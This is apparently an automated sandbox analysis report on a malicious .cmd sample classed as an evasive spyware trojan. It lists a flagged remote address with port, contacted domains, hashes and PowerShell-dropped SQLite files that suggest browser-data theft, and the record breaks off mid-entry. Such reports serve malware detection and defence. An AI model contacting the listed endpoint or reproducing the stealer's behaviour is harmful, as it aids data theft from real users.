      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      api.ip.sb
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://51.195.145.77:57942/true
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://ac.ecosia.org/autocomplete?q=tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
          • URL Reputation: safe
          unknown
          https://duckduckgo.com/chrome_newtabtmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
          • URL Reputation: safe
          unknown
          https://duckduckgo.com/ac/?q=tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
          • URL Reputation: safe
          unknown
          https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            unknown
            http://crl.micropowershell.exe, 00000005.00000002.1448410913.00000000077CB000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1445238637.00000000051F8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            • URL Reputation: safe
            unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            • URL Reputation: safe
            unknown
            https://www.ecosia.org/newtab/tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.drfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            51.195.145.77
            unknownFrance
            16276OVHFRtrue
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1535306
            Start date and time:2024-10-16 20:38:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 3m 27s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:z52PO0048857.cmd
            Detection:MAL
            Classification:mal96.troj.spyw.evad.winCMD@8/51@1/1
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 6
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .cmd
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
            • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 4080 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • VT rate limit hit for: z52PO0048857.cmd
            TimeTypeDescription
            14:39:06API Interceptor48x Sleep call for process: powershell.exe modified
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            OVHFR(No subject) (87).emlGet hashmaliciousHTMLPhisherBrowse
            • 54.36.150.180
            SecuriteInfo.com.Trojan.DownLoader25.33926.32281.13140.exeGet hashmaliciousUnknownBrowse
            • 213.251.172.94
            SecuriteInfo.com.Trojan.DownLoader25.33926.32281.13140.exeGet hashmaliciousUnknownBrowse
            • 213.251.172.94
            https://guillaumerobin.com/djvjnvdjndjvjnjnvjnvdjn.htmlGet hashmaliciousUnknownBrowse
            • 51.91.236.193
            na.elfGet hashmaliciousUnknownBrowse
            • 54.36.111.116
            na.elfGet hashmaliciousMiraiBrowse
            • 87.98.146.134
            na.elfGet hashmaliciousMiraiBrowse
            • 51.254.200.167
            na.elfGet hashmaliciousMiraiBrowse
            • 37.187.28.223
            na.elfGet hashmaliciousUnknownBrowse
            • 54.36.111.116
            https://braxishost.com/Get hashmaliciousUnknownBrowse
            • 144.217.191.134
            No context
            No context
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):5829
            Entropy (8bit):4.901113710259376
            Encrypted:false
            SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
            MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
            SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
            SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
            SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):8672
            Entropy (8bit):5.697815035647521
            Encrypted:false
            SSDEEP:192:cyt3CzJFQjMVyhGUUG59HGVWMc0qj5twXTm:ci3CzJFQj/hzDHG8XhjOTm
            MD5:818C46B29F3B210B3000C88BB0CC3A1E
            SHA1:A7038972B9FF12A44489AEE123E9942A66E63FC8
            SHA-256:4D7096B0AB0529BD43072CFA14E59FF81A6B7E39FFB9CF152640523508E62E39
            SHA-512:DB77FF5B61B2718FE0E0B0AB9F54C9090AE83BE1217F46802426921E1884B00DDB3E75D9FE63F5D6DF6E06D06249DB442B8447DD72622BF81B4810A26688D123
            Malicious:false
            Reputation:low
            Preview:@...e...........................................................<...................W..I......B6........System.ServiceModel.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D...
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):106496
            Entropy (8bit):1.1373607036346451
            Encrypted:false
            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
            MD5:64BCCF32ED2142E76D142DF7AAC75730
            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
            Malicious:false
            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
